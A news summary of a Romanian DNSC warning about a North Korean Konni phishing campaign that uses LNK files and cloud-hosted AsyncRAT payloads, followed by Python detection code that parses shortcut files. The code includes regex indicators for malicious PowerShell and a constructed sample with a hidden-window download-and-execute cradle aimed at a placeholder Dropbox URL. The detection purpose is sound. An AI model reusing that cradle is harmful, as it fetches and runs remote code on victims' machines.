The Romanian National Directorate of Cyber Security (DNSC) issued an important warning about an ongoing phishing campaign attributed to the North Korean group Konni
- The Romanian National Directorate of Cyber Security (DNSC) warned on March 19, 2025, about a phishing campaign linked to the North Korean group Konni. The group targets users with emails that carry malicious LNK (Windows shortcut) files.
- In this campaign the phishing email is only the entry point: the malware itself is downloaded through trusted cloud services such as Dropbox or Google Drive, which makes the attack harder to spot. The DNSC said the ongoing campaign was identified through open-source monitoring and is associated with the North Korean state actors known as APT37 and Kimsuky.
- The attackers use cloud storage platforms, which are generally regarded as safe, to conceal their malicious activity. Experts stress that users should remain vigilant and avoid opening suspicious files or links received by email, even when they appear to come from a trustworthy source.
- The Konni group uses LNK files to deliver the AsyncRAT malware. These shortcut files abuse Windows to run harmful commands without relying on Office macros, thereby sidestepping a common defence against document-borne malware in Microsoft Office. When a targeted user opens such a file, a concealed PowerShell script runs, downloads and displays a decoy document, and silently installs the malware.
- Command-and-control servers and trusted cloud services are used at several stages of the attack chain to install malware on victims' systems. The Konni group has been active since 2014, has mainly targeted South Korean and Russian systems, and is associated with the Kimsuky group, which is tied to North Korea's military intelligence. Its attacks usually aim at data theft and show similarities to the tactics of state actors such as APT37 and the Lazarus Group.
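As an added illustration of the detection side (not code from the DNSC advisory or from any of the reporting above), the following Python parses the MS-SHLLINK header and StringData fields of a .lnk file and flags the traits described above: a PowerShell target, a hidden or minimised window, and a run-time download from a trusted cloud host. The indicator list, the two sample shortcuts and the placeholder Dropbox URL are constructed assumptions for the demonstration, not indicators taken from the campaign.

```python
import re
import struct
# MS-SHLLINK: LinkFlags bits, the ShowCommand that hides a console window, ShellLink CLSID
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE, SW_SHOWMINNOACTIVE = 0x01, 0x02, 0x80, 7
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"), (0x20, "arguments"), (0x40, "icon_location"))
CLSID = bytes.fromhex("0114020000000000c000000000000046")
# Assumed indicators, matched against the lower-cased target path plus arguments
SUSPICIOUS = [
    (r"powershell", "shortcut launches PowerShell"),
    (r"-(w|win|windowstyle)\s+hidden", "hidden PowerShell window"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", "downloads content at run time"),
    (r"(dropbox|drive\.google|docs\.google)\.com", "payload fetched from a trusted cloud host"),
    (r"\biex\b|invoke-expression", "executes downloaded text"),
]
def build_lnk(relative_path, arguments, show_cmd=1):
    # Constructed minimal .lnk: 76-byte header followed by two Unicode StringData fields
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, CLSID, 0x08 | 0x20 | IS_UNICODE, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    field = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + field(relative_path) + field(arguments)
def parse_lnk(data):
    # Returns ShowCommand plus whichever StringData fields the LinkFlags say are present
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != CLSID:
        raise ValueError("not a shell link")
    flags, show_cmd = struct.unpack_from("<I", data, 0x14)[0], struct.unpack_from("<I", data, 0x3C)[0]
    off = 0x4C
    if flags & HAS_IDLIST:                      # skip LinkTargetIDList (2-byte size prefix)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                    # skip LinkInfo (its 4-byte size counts itself)
        off += struct.unpack_from("<I", data, off)[0]
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    out = {"show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0] * width
            out[key] = data[off + 2:off + 2 + n].decode(enc)
            off += 2 + n
    return out
def assess(data):
    # Reasons a shortcut looks like the LNK-to-PowerShell dropper described above
    info = parse_lnk(data)
    text = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    findings = [why for pat, why in SUSPICIOUS if re.search(pat, text)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised so the console stays out of sight")
    return findings
BENIGN = build_lnk(r"..\..\Windows\notepad.exe", "readme.txt")   # constructed samples
DROPPER = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "-w hidden -nop -c "
                    "\"iex (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/PLACEHOLDER/r.txt?dl=1')\"", SW_SHOWMINNOACTIVE)
```

Running `assess()` over the shortcuts attached to inbound mail, or over the user's Downloads folder, gives a cheap triage signal that does not depend on the cloud host being blocked.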